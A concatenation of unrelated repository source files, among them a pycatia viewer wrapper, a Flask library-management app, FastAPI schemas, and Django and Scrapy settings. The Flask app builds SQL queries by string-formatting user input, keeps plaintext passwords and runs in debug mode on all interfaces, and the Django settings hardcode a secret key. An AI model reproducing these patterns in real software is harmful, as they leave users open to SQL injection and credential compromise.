:param tuple color:
:return: None
:rtype: None
"""
return self.viewer.PutBackgroundColor(color)
# # # # Autogenerated comment:
# # some methods require a system service call as the methods expects a vb array object
# # passed to it and there is no way to do this directly with python. In those cases the following code
# # should be uncommented and edited accordingly. Otherwise completely remove all this.
# # vba_function_name = 'put_background_color'
# # vba_code = """
# # Public Function put_background_color(viewer)
# # Dim color (2)
# # viewer.PutBackgroundColor color
# # put_background_color = color
# # End Function
# # """
# # system_service = self.application.system_service
# # return system_service.evaluate(vba_code, 0, vba_function_name, [self.com_object])
def reframe(self) -> None:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Sub Reframe()
|
| Reframes the viewer's contents (Fits all in). Reframing means that the
| viewer's contents is zoomed in or out to enable every object of the scene to be
| displayed in such a way that most of the space available in the viewer is used,
| just leaving a thin empty strip around the scene.
|
| Example:
| This example reframes the contents of the MyViewer
| viewer.
|
| MyViewer.Reframe()
:return: None
:rtype: None
"""
return self.viewer.Reframe()
def update(self) -> None:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Sub Update()
|
| Updates the viewer's contents. Since the viewer is not automatically
| updated after a viewpoint modification (for performance reasons), it must be
| explicitely redrawn when needed.
|
| Example:
| This example updates the contents of the MyViewer
| viewer.
|
| MyViewer.Update()
:return: None
:rtype: None
"""
return self.viewer.Update()
def zoom_in(self) -> None:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Sub ZoomIn()
|
| Zooms in the viewer's contents.
|
| Example:
| This example zooms in the contents of the MyViewer
| viewer.
|
| MyViewer.ZoomIn()
:return: None
:rtype: None
"""
return self.viewer.ZoomIn()
def zoom_out(self) -> None:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Sub ZoomOut()
|
| Zooms out the viewer's contents.
|
| Example:
| This example zooms out the contents of the MyViewer
| viewer.
|
| MyViewer.ZoomOut()
:return: None
:rtype: None
"""
return self.viewer.ZoomOut()
def __repr__(self):
return f'Viewer(name="{self.name}")'
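# Illustrative usage sketch (assumptions: a live CATIA session and a `Viewer`
# instance already obtained elsewhere through pycatia; the numeric capture
# format code below is a guess, not a confirmed constant):
#
# viewer.reframe()                             # fit the whole scene
# viewer.put_background_color((0, 0, 1))       # blue background, RGB in [0, 1]
# viewer.capture_to_file(i_format=4, i_file=r"e:\MyImage.bmp")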
|
[
"evereux@gmail.com"
] |
evereux@gmail.com
|
68ce4caaa316af0f30c71d5472dcb767d1f1f30e
|
01e1c51f28aaf864544796e5e3be489fc104371a
|
/mymod1v1KLQ.py
|
3304a5e374f852cec51cc341c803642dc98dacc0
|
[] |
no_license
|
Koliqa/Hello_World
|
684ec833f6f81acffcada5888b9d955102d6d78a
|
b6cdf0ff30c9289fdf2867fecaa275904e416714
|
refs/heads/master
| 2022-09-01T23:41:33.146852
| 2020-05-29T18:57:45
| 2020-05-29T18:57:45
| 267,927,808
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 46
|
py
|
def Hello_World():
print('Hello, World!')
|
[
"kolyaleonof@yandex.ru"
] |
kolyaleonof@yandex.ru
|
6417d2f145dc5e63cf8c84e28b83e740ff791163
|
aa99bc17310a3c86e55e180ce1059d16943f1e7f
|
/Other/Archive/single_dipole_performance.py
|
8d59e2bf019a813c4dec7326b5de1a5c193b3fe7
|
[] |
no_license
|
didierquintius/MasterAIThesis
|
979f9bf3971e114202b6f26c673ed3f3386a4ae6
|
90bf43071b1ae067d77ee5be53dab86b3232ad7a
|
refs/heads/master
| 2023-03-26T06:03:58.087176
| 2021-04-02T05:18:55
| 2021-04-02T05:18:55
| 299,134,329
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,334
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Tue Mar 9 11:57:22 2021
@author: didie
"""
from BrainAreaFunctions import train_brain_area
import pandas as pd
from tqdm import tqdm
import pickle
#%%
params = dict(nodes_pred = 50,
nodes_Conv_clas = 45,
nodes_Dense_clas = 19,
kernel_size = 7,
strides = 1,
learning_rate_pred = 1e-5,
learning_rate_clas = 1e-4,
batch_sizes_pred = 25,
batch_sizes_clas = 5,
val_treshold_pred = 1e-8,
val_treshold_clas = 1e-8,
max_val_amount_pred = 50,
max_val_amount_clas = 50,
val_freq_pred = 100,
val_freq_clas = 5,
EPOCHS_pred = 30,
EPOCHS_clas = 20,
trials = 1000,
time_steps = 100,
brain_areas = 1000)
#%%
#resultaten = pickle.load(open('./eerste_resultaten.pkl','rb'))
for brain_area in [390]:
mse_pred, mse_clas, truepositive_clas, truenegative_clas, STOP, STOP_clas = train_brain_area(brain_area, params, plot = True)
#resultaten.loc[brain_area] = [mse_pred, mse_clas, truepositive_clas, truenegative_clas, STOP, STOP_clas]
# pickle.dump(resultaten, open('./eerste_resultaten.pkl','wb'))
|
[
"71985682+didierquintius@users.noreply.github.com"
] |
71985682+didierquintius@users.noreply.github.com
|
e3734f768f54c8eac7752f58696a154cc2b4a326
|
07315ed7bc7761cd24840c93fe38c12b34cc507a
|
/api/schemas/fav.py
|
81444288d1f1d35effeb6886ffc593643337fe41
|
[] |
no_license
|
speeed131/FavImage
|
a545f65a1d95f371da4adeab5dade70ee178fc0c
|
fd5648b29bfba4c65402e603e3c96a88689dfa9f
|
refs/heads/main
| 2023-08-25T10:22:19.652152
| 2021-11-01T13:12:39
| 2021-11-01T13:12:39
| 397,822,805
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 402
|
py
|
from typing import Optional
from fastapi import FastAPI
from pydantic import BaseModel, Field
from api.schemas.images import Image
class FavoriteImage(Image):
user_id: int = Field(example=1)
class Config:
orm_mode = True
class FavoriteImageResponse(BaseModel):
id: int
class Config:
orm_mode = True
class DeleteFavoriteImageResponse(FavoriteImageResponse):
pass
|
[
"speeed131@gmail.com"
] |
speeed131@gmail.com
|
67af4b16e00a4fbacf0c0986c9e02028ec42c508
|
03965a2a2066e72201b73dbbd8151bad2d64bfe7
|
/main.py
|
0f2eccfdaac86e3f7c7d70060abd483fe6eea961
|
[] |
no_license
|
vsfh/Library-Management
|
1fb2692d0877dbae6db44ec8fb2e2a1cf90610ad
|
939361684d9877e9dc0face0ff278a663d1c6a79
|
refs/heads/master
| 2021-05-20T15:21:36.684613
| 2020-04-02T03:43:57
| 2020-04-02T03:43:57
| 252,347,346
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 15,239
|
py
|
from flask import Flask, render_template, request, flash, jsonify, redirect, url_for, session
from utils import query, map_student_course, recommed_module
from config import config
import json
import time
import numpy as np
import os
import cx_Oracle
# Create the Flask application object
app = Flask(__name__)
app.config['SECRET_KEY'] = 'gsolvit'
@app.route('/index', methods=['GET', 'POST'])
def index():
return render_template('index.html')
@app.route('/manager', methods=['GET', 'POST'])
def manager():
sql = "select * from coder.lib_user"
result = query.query(sql)
return render_template('manager.html', result=result)
@app.route('/reader', methods=['GET', 'POST'])
def reader():
name = session.get('name')
sql = "select * from coder.borrowed where usr_id = ('%s')" % (name)
result = query.query(sql)
return render_template('reader.html', result=result)
@app.route('/bookList/?<string:bname>', methods=['GET', 'POST'])
def bookList(bname):
name = session.get('name')
sql = "select * from coder.book where bname = ('%s')" % (bname)
result = query.query(sql)
result2 = np.array(result)
result3 = []
for i in range(result2.shape[0]):
a = "../static/images/"+result2[i][0]+".jpg"
result3.append(a)
result3 = np.array(result3)
result2 = np.c_[result2,result3]
return render_template('bookList.html', result=result2)
@app.route('/bookSearch', methods=['GET', 'POST'])
def bookSearch():
stu_id = session.get('stu_id')
#print(stu_id)
if stu_id == 'reader':
if request.method == 'GET':
#print('1111')
return render_template('bookSearch.html')
else:
#print('222')
bname = request.form.get('bname')
print(bname)
query.getImage(bname)
sql = "select * from coder.book where bname = ('%s')" % (bname)
result = query.query(sql)
return redirect(url_for('bookList',bname=bname))
else:
return u'页面不存在'
@app.route('/managerAdd', methods=['GET', 'POST'])
def managerAdd():
stu_id = session.get('stu_id')
#print(stu_id)
if stu_id == 'librarian':
if request.method == 'GET':
#print('1111')
return render_template('managerAdd.html')
else:
#print('222')
usr_id = request.form.get('usr_id')
usr_password = request.form.get('usr_password')
usr_type = request.form.get('usr_type')
sql="INSERT INTO coder.lib_user VALUES ('%s','%s','%s')" % (usr_id,usr_password,usr_type)
#print(sql)
query.update(sql)
return redirect(url_for('manager'))
else:
return u'页面不存在'
@app.route('/managerDelete', methods=['GET', 'POST'])
def managerDelete():
stu_id = session.get('stu_id')
#print(stu_id)
if stu_id == 'librarian':
if request.method == 'GET':
#print('1111')
return render_template('managerDelete.html')
else:
#print('222')
usr_id = request.form.get('usr_id')
sql="DELETE FROM coder.lib_user WHERE usr_id='%s'" % usr_id
#print(sql)
query.update(sql)
return redirect(url_for('manager'))
else:
return u'页面不存在'
@app.route('/bookBorrow', methods=['GET', 'POST'])
def bookBorrow():
stu_id = session.get('stu_id')
#print(stu_id)
if stu_id == 'librarian':
if request.method == 'GET':
#print('1111')
return render_template('bookBorrow.html')
else:
#print('222')
usr_id = request.form.get('usr_id')
bid = request.form.get('bid')
return_date = request.form.get('return_date')
sql="INSERT INTO coder.borrowed VALUES ('%s','%s','%s')" % (usr_id,bid,return_date)
#print(sql)
query.update(sql)
return redirect(url_for('manager'))
else:
return u'页面不存在'
@app.route('/bookReturn', methods=['GET', 'POST'])
def bookReturn():
stu_id = session.get('stu_id')
#print(stu_id)
if stu_id == 'librarian':
if request.method == 'GET':
#print('1111')
return render_template('bookReturn.html')
else:
#print('222')
bid = request.form.get('usr_id')
sql="DELETE FROM coder.borrowed WHERE bid='%s'" % bid
#print(sql)
query.update(sql)
return redirect(url_for('manager'))
else:
return u'页面不存在'
@app.route('/bookIn', methods=['GET', 'POST'])
def bookIn():
stu_id = session.get('stu_id')
#print(stu_id)
if stu_id == 'librarian':
if request.method == 'GET':
#print('1111')
return render_template('bookIn.html')
else:
#print('222')
bname = request.form.get('bname')
bid = request.form.get('bid')
path = request.form.get('path')
query.blob(bid,bname,path)
return redirect(url_for('manager'))
else:
return u'页面不存在'
@app.route('/bookOut', methods=['GET', 'POST'])
def bookOut():
stu_id = session.get('stu_id')
#print(stu_id)
if stu_id == 'librarian':
if request.method == 'GET':
#print('1111')
return render_template('bookOut.html')
else:
#print('222')
bid = request.form.get('bid')
sql="DELETE FROM coder.book WHERE bid='%s'" % bid
#print(sql)
query.update(sql)
return redirect(url_for('manager'))
else:
return u'页面不存在'
@app.route('/course_discussion', methods=['GET', 'POST'])
def course_discussion():
if request.method == 'GET':
return render_template('course_discussion.html')
else:
topic = request.form.get('topic')
comments = request.form.get('comments')
#commenter = request.form.get('commenter')
# print(len(topic))
# print('course_discussion')
# print(topic, commenter, comments)
stu_id = session.get('stu_id')
sql = "select NAME from STUDENT where STU_NO = '%s'" % stu_id
stu_name = query.query(sql)
stu_name = stu_name[0][0]
now = time.time()
now = time.strftime('%Y-%m-%d', time.localtime(now))
now = str(now)
news_id = stu_name + now
sql = "INSERT INTO NEWS(TOPIC, COMMENTS, COMMENTER, NEWS_ID, IS_FIRST) VALUES ('%s', '%s', '%s', '%s', '0')" % (topic, comments, stu_name, news_id)
print(sql)
query.update(sql)
return redirect(url_for('news_center'))
@app.route('/', methods=['GET', 'POST'])
@app.route('/login', methods=['GET', 'POST'])
def login():
if request.method=='GET':
return render_template('login.html')
else:
stu_id = request.form.get('stu_id')
password = request.form.get('password')
if config['USER']=='librarian':
sql = "select * from coder.lib_user where usr_id = '%s'" % stu_id
result = query.query(sql)
else:
sql = "select * from coder.lib_user_view where usr_id = '%s'" % stu_id
result = query.query(sql)
print(result)
if len(result) != 0:
#print(result[0][6], password)
if (result[0][1] == password and result[0][2] == config['USER']):
session['name'] = result[0][0]
session['stu_id'] = result[0][2]
session.permanent=True
print(result[0][1])
if config['USER']=='librarian':
return redirect(url_for('manager'))
else:
return redirect(url_for('reader'))
else:
return u'账号或密码错误'
else:
return u'不存在这个用户'
@app.route('/register', methods=['GET', 'POST'])
def register():
if request.method=='GET':
return render_template('register.html')
else:
stu_id = request.form.get('stu_id')
user = request.form.get('user')
password = request.form.get('password')
password1 = request.form.get('password1')
print(stu_id, user, password, password1)
if(password1 != password):
return u'两次输入密码不同,请检查'
else:
sql = "select * from STUDENT where STU_NO = '%s'" % stu_id
#print(sql)
result = query.query(sql)
#print(result)
if len(result) == 0:
return u'没有这个用户了'
else:
if result[0][6] == user:
sql = "UPDATE student SET PASSWORD='%s' WHERE STU_NO='%s'" % (password, stu_id)
query.update(sql)
return redirect(url_for('login'))
else:
return u'密码错误'
@app.route('/news_center', methods=['GET', 'POST'])
def news_center():
sql = "select * from NEWS WHERE IS_FIRST='0'"
result = query.query(sql)
print(result)
return render_template('news_center.html', result=result)
@app.route('/detail/<question>', methods=['GET', 'POST'])
def detail(question):
print(question)
#question=str(question)
if request.method=='GET':
sql="SELECT TOPIC, COMMENTS, COMMENTER, CREATE_TIME FROM NEWS WHERE NEWS_ID='%s' AND IS_FIRST='0'" % question
title=query.query(sql)
#print(title)
title=title[0]
sql="SELECT * FROM NEWS WHERE IS_FIRST='%s'" % question
result=query.query(sql)
return render_template('detail.html', title=title, result=result)
else:
comments = request.form.get('comments')
stu_id = session.get('stu_id')
sql = "select NAME from STUDENT where STU_NO = '%s'" % stu_id
stu_name = query.query(sql)
stu_name = stu_name[0][0]
now = time.time()
now = time.strftime('%Y-%m-%d', time.localtime(now))
now = str(now)
news_id = stu_name + now
sql = "INSERT INTO NEWS(TOPIC, COMMENTS, COMMENTER, NEWS_ID, IS_FIRST) VALUES ('回复', '%s', '%s', '%s', '%s')" % (comments, stu_name, news_id,question)
print(sql)
query.update(sql)
sql = "SELECT TOPIC, COMMENTS, COMMENTER, CREATE_TIME FROM NEWS WHERE NEWS_ID='%s' AND IS_FIRST='0'" % question
title = query.query(sql)
# print(title)
title = title[0]
sql = "SELECT * FROM NEWS WHERE IS_FIRST='%s'" % question
result = query.query(sql)
return render_template('detail.html', title=title, result=result)
@app.route('/recommed', methods=['GET', 'POST'])
def recommed():
return render_template('recommed.html')
@app.route("/getRecommedData", methods=['GET','POST'])
def getRecommedData():
stu_no = session.get('stu_id')
id2Student, id2Course, stuNo2MatId = map_student_course.get_map_student()
scoreMatrix = map_student_course.get_matrix(id2Student)
"""
函数,recommedCourse:使用SVD进行课程推荐:
返回:(课程1ID, 课程1评分)
"""
topNCourse, topNStudent = recommed_module.recommedCoursePerson(scoreMatrix, stuNo2MatId[stu_no], N=20)
"""
将得到的Course与Person装换为前端图标需要的json格式:
{
"source": [
[2.3, "计算机视觉"],
[1.1, "自然语言处理"],
[2.4, "高等数学"],
[3.1, "线性代数"],
[4.7, "计算机网络"],
[5.1, "离散数学"]
]
}
"""
id2Student = {i:id2Student[i][0] for i in id2Student.keys()}
print(id2Student)
print(id2Course)
courseJson = recommed_module.toBarJson(topNCourse, id2Course)
personJson = recommed_module.toBarJson(topNStudent, id2Student)
courseJson = recommed_module.regularData(courseJson, 1, 5)
personJson = recommed_module.regularData(personJson, 0, 1)
coursePersonJson = {}
coursePersonJson['course'] = courseJson
coursePersonJson['person'] = personJson
return jsonify(coursePersonJson)
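# Illustrative sketch (not the project's recommed_module): a plain truncated-SVD
# completion of the student-course score matrix could look like the following,
# where `k` (rank), `stu_row` and `N` are hypothetical values:
#
#   import numpy as np
#   U, s, Vt = np.linalg.svd(scoreMatrix, full_matrices=False)
#   approx = (U[:, :k] * s[:k]) @ Vt[:k, :]               # low-rank reconstruction
#   top_courses = np.argsort(approx[stu_row])[::-1][:N]   # highest predicted scores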
@app.route('/personal_information', methods=['GET', 'POST'])
def personal_information():
"""
功能(个人中心界面): 根据"stu_id"从数据库中得到学生基本信息,用于个人中心信息显示
:return:
"""
stu_no = session.get('stu_id')
print(stu_no + ' is stu_no')
sql = "SELECT * FROM student WHERE STU_NO = '%s'" % stu_no
result = query.query(sql)
return render_template('personal_information.html', result=result)
@app.route('/train_plan', methods=['GET', 'POST'])
def train_plan():
return render_template('train_plan.html')
@app.route('/get_info', methods=['GET', 'POST'])
def get_info():
"""
功能(培养计划界面): 初始进入培养计划界面,根据stu_id从数据库中得到数据并将其转换为计划树所需json格式数据
:return: planTree:(json) 计划树所需数据
"""
stu_id = session.get('stu_id')
planTree = query.getPlanTreeJson(stu_id)
print(planTree)
return jsonify(planTree)
@app.route('/submit_train_plan', methods=['GET', 'POST'])
def submit_train_place():
"""
功能1:实现数据库学生选课信息的更新
功能2: 实现计划树以及进度条的提交更新。
:return:
"""
"""功能1:"""
twoData = request.get_json(force=True)
train_plan = twoData['tree']
scores = twoData['scores']
#train_plan['name'] = "数据转换成功"
print('反馈回来的数据是:')
print(train_plan)
data = train_plan['children']
array_finish = [0]*120
#print(array_finish)
for data_children in data:
data_children = data_children['children']
#print(data_children)
for data_children_child_1 in data_children:
#print('data_children_child', data_children_child)
data_children_child_1 = data_children_child_1['children']
for data_children_child in data_children_child_1:
name = data_children_child['children'][0]['name']
color = data_children_child['children'][0]['itemStyle']['borderColor']
#print(name, color)
sql = "select CO_100 from education_plan WHERE CO_NAME='%s'" % name
co_100 = query.query(sql)
co_100 = co_100[0][0]
if color == 'red':
array_finish[int(co_100)] = 0
else:
array_finish[int(co_100)] = 1
finish_co = ''
for i in range(1, 119):
if array_finish[i] == 1:
finish_co += '1'
else:
finish_co += '0'
print(finish_co)
#print(array_finish)
stu_id = session.get('stu_id')
query.updateDatabase(stu_id, train_plan)
query.updateScore(stu_id, scores)
"""功能2:"""
train_plan_str = json.dumps(train_plan)
train_plan_str = train_plan_str.replace("yellow", "green")
train_plan = json.loads(train_plan_str)
return jsonify(train_plan)
if __name__ == '__main__':
app.run("0.0.0.0", debug=True)
|
[
"508178817@qq.com"
] |
508178817@qq.com
|
98be3bc8b64729359909a13f9c2c0dd6984bcf8f
|
294f244e6b671f0ce9d9f5232644d9f6ae62d95e
|
/blog/urls.py
|
d977e87bb348c79d38be5db7ab50be273a4b128b
|
[] |
no_license
|
hagahiro/django-framework-study
|
c38d624f09f251a05b3871e4fd01da6d1fd13db0
|
7643b964a4b1d25b694b3f0c1072ae10d55ef0f7
|
refs/heads/master
| 2023-06-19T10:05:57.564401
| 2021-07-16T13:27:28
| 2021-07-16T13:27:28
| 386,646,641
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 377
|
py
|
from django.urls import path
from . import views
urlpatterns = [
path("", views.Index.as_view(), name = "index"),
path("detail/<pk>/", views.Detail.as_view(), name="detail"),
path("create/", views.Create.as_view(), name="create"),
path("update/<pk>", views.Update.as_view(), name="update"),
path("delete/<pk>", views.Delete.as_view(), name="delete")]
|
[
"you@example.com"
] |
you@example.com
|
83db18db2c0810886caf6d42ca2fd18c0b571e8a
|
086973e0c9db0e92f44e2c30bf9183a28320d9b9
|
/Sprint2Experimento/wsgi.py
|
b4d2b899d648306121785661029ddb0e94a1c650
|
[] |
no_license
|
afsanchezr1/Sprint2Experimento
|
b48646492243bd0ba8ab7e3bd5ccc0c11088a25f
|
4ddbc8fbcbf335171c8fa314a5f108a257f2dbe3
|
refs/heads/master
| 2022-12-19T22:14:37.314194
| 2020-10-02T03:51:50
| 2020-10-02T03:51:50
| 300,455,410
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 413
|
py
|
"""
WSGI config for Sprint2Experimento project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'Sprint2Experimento.settings')
application = get_wsgi_application()
|
[
"afsanchezr1@uniandes.edu.co"
] |
afsanchezr1@uniandes.edu.co
|
6df85996bb86e919549a37c35b69b6c190d39ed6
|
745ca0b2c95f9a0ca4f492fbe71750d311c0f782
|
/scrape/scrape/settings.py
|
2a94c322a3679e475c2b7e1f4bf5c45f5bb48cc6
|
[] |
no_license
|
RNSAINJU/fpl
|
930a2f65c46a5d9c8668dccc4707d3be72e3c6ac
|
c9e6734db04a3ee55605f102751604beae1db3b9
|
refs/heads/master
| 2022-12-14T11:54:55.820823
| 2020-09-16T07:57:07
| 2020-09-16T07:57:07
| 295,941,256
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,172
|
py
|
# -*- coding: utf-8 -*-
# Scrapy settings for scrape project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# https://docs.scrapy.org/en/latest/topics/settings.html
# https://docs.scrapy.org/en/latest/topics/downloader-middleware.html
# https://docs.scrapy.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'scrape'
SPIDER_MODULES = ['scrape.spiders']
NEWSPIDER_MODULE = 'scrape.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'scrape (+http://www.yourdomain.com)'
# Obey robots.txt rules
ROBOTSTXT_OBEY = True
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS = 32
# Configure a delay for requests for the same website (default: 0)
# See https://docs.scrapy.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN = 16
#CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
#COOKIES_ENABLED = False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED = False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See https://docs.scrapy.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'scrape.middlewares.ScrapeSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See https://docs.scrapy.org/en/latest/topics/downloader-middleware.html
#DOWNLOADER_MIDDLEWARES = {
# 'scrape.middlewares.ScrapeDownloaderMiddleware': 543,
#}
# Enable or disable extensions
# See https://docs.scrapy.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.extensions.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See https://docs.scrapy.org/en/latest/topics/item-pipeline.html
#ITEM_PIPELINES = {
# 'scrape.pipelines.ScrapePipeline': 300,
#}
# Enable and configure the AutoThrottle extension (disabled by default)
# See https://docs.scrapy.org/en/latest/topics/autothrottle.html
#AUTOTHROTTLE_ENABLED = True
# The initial download delay
#AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG = False
# Enable and configure HTTP caching (disabled by default)
# See https://docs.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED = True
#HTTPCACHE_EXPIRATION_SECS = 0
#HTTPCACHE_DIR = 'httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES = []
#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
|
[
"aryan.sainju@gmail.com"
] |
aryan.sainju@gmail.com
|
740c66022712b423c6063a8d4b4c4832f485043d
|
a5904e66bdbc211619596b88e30e6dd8b36ccbb5
|
/data_types/data2D.py
|
36a6f90383467d9d8033c44d7e346209270cb7ef
|
[
"MIT"
] |
permissive
|
Vrekrer/magdynlab
|
beee86775649f8f0aea67ca9bac17fc54937b6d8
|
f5149d3213a37c7c18f39876c3e2367fc7deb9e8
|
refs/heads/master
| 2021-06-10T16:29:41.467864
| 2021-01-15T05:49:18
| 2021-01-15T05:49:18
| 91,998,778
| 10
| 4
| null | 2017-07-06T22:05:34
| 2017-05-22T01:15:38
|
Python
|
UTF-8
|
Python
| false
| false
| 1,469
|
py
|
# coding=utf-8
# Author: Diego González Chávez
# email : diegogch@cbpf.br / diego.gonzalez.chavez@gmail.com
#
# Data 2D
#
# TODO:
# Make documentation
import numpy
__all__ = ['Data2D']
class Data2D(object):
'''Data container for tabular data
By default only two columns are used
    these can be accessed using the X and Y properties
'''
def __init__(self):
self.reset()
self.header = None
self.fmt = 'txt'
self.str_fmt = '%.6E'
self.reset()
def reset(self, n=2):
self.dat = numpy.array([numpy.zeros((n)) * numpy.NaN])
def addPoint(self, *values):
pt = numpy.array(list(values))
if not numpy.any(numpy.isfinite(self.dat)):
self.dat[0] = pt
else:
self.dat = numpy.append(self.dat, [pt], axis=0)
def save(self, fileName):
if self.header is None:
numpy.savetxt(fileName, self.dat, fmt=self.str_fmt)
else:
numpy.savetxt(fileName, self.dat,
fmt=self.str_fmt, header=self.header)
# TODO implement npy saves
def load(self, fileName):
if self.header is None:
sr = 0
else:
sr = self.header.count('\n') + 1
self.dat = numpy.loadtxt(fileName, skiprows=sr)
# TODO implement npy loads
@property
def X(self):
return self.dat[:, 0]
@property
def Y(self):
return self.dat[:, 1]
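# A minimal usage sketch for the Data2D container above; the output file name
# 'example.dat' is arbitrary. It fills the table point by point, reads back the
# column views, and writes the data with the configured format string.
if __name__ == '__main__':
    d = Data2D()
    for x in numpy.linspace(0.0, 1.0, 5):
        d.addPoint(x, x ** 2)        # one (X, Y) row per call
    print(d.X)                       # first column
    print(d.Y)                       # second column
    d.header = 'X Y'
    d.save('example.dat')            # numpy.savetxt with str_fmt and header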
|
[
"diego.gonzalez.chavez@gmail.com"
] |
diego.gonzalez.chavez@gmail.com
|
da0fb435b2d15e90a57a23a000e23fda811be8ea
|
d20267e921888435d22442fe6275b6eca9f74307
|
/tests/settings.py
|
1ed61af3fa10d2f67732553692fb6cf43e38da0a
|
[
"MIT"
] |
permissive
|
ELDAELRA/djangocms_slick_slider
|
d72b96a27761dde3c4035cd308a94f22c5647559
|
57678d45b262083df5eeee2b88c2eee93699f064
|
refs/heads/master
| 2020-04-28T21:48:28.215464
| 2020-03-18T11:06:10
| 2020-03-18T13:58:53
| 175,595,458
| 0
| 0
|
MIT
| 2019-03-14T10:03:03
| 2019-03-14T10:03:02
| null |
UTF-8
|
Python
| false
| false
| 5,080
|
py
|
import os
gettext = lambda s: s
DATA_DIR = os.path.dirname(os.path.dirname(__file__))
"""
Django settings for example project.
Generated by 'django-admin startproject' using Django 1.8.18.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '%3sxux49)lr(y73zylv88#wkg47tm$puw-#p7%1xmcj$4xyvkb'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'de'
TIME_ZONE = 'Europe/Berlin'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(DATA_DIR, 'media')
STATIC_ROOT = os.path.join(DATA_DIR, 'static')
SITE_ID = 1
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'OPTIONS': {
'context_processors': [
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'django.template.context_processors.i18n',
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.template.context_processors.media',
'django.template.context_processors.csrf',
'django.template.context_processors.tz',
'sekizai.context_processors.sekizai',
'django.template.context_processors.static',
'cms.context_processors.cms_settings'
],
'loaders': [
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
'django.template.loaders.eggs.Loader'
],
},
},
]
MIDDLEWARE_CLASSES = (
'cms.middleware.utils.ApphookReloadMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'cms.middleware.user.CurrentUserMiddleware',
'cms.middleware.page.CurrentPageMiddleware',
'cms.middleware.toolbar.ToolbarMiddleware',
'cms.middleware.language.LanguageCookieMiddleware'
)
INSTALLED_APPS = (
'djangocms_admin_style',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.admin',
'django.contrib.sites',
'django.contrib.sitemaps',
'django.contrib.staticfiles',
'django.contrib.messages',
'cms',
'menus',
'sekizai',
'treebeard',
'djangocms_text_ckeditor',
'filer',
'easy_thumbnails',
'djangocms_column',
'djangocms_link',
'cmsplugin_filer_file',
'cmsplugin_filer_folder',
'cmsplugin_filer_image',
'cmsplugin_filer_utils',
'djangocms_style',
'djangocms_snippet',
'djangocms_googlemap',
'djangocms_video',
'djangocms_slick_slider',
)
LANGUAGES = (
## Customize this
('de', gettext('de')),
)
CMS_LANGUAGES = {
## Customize this
'default': {
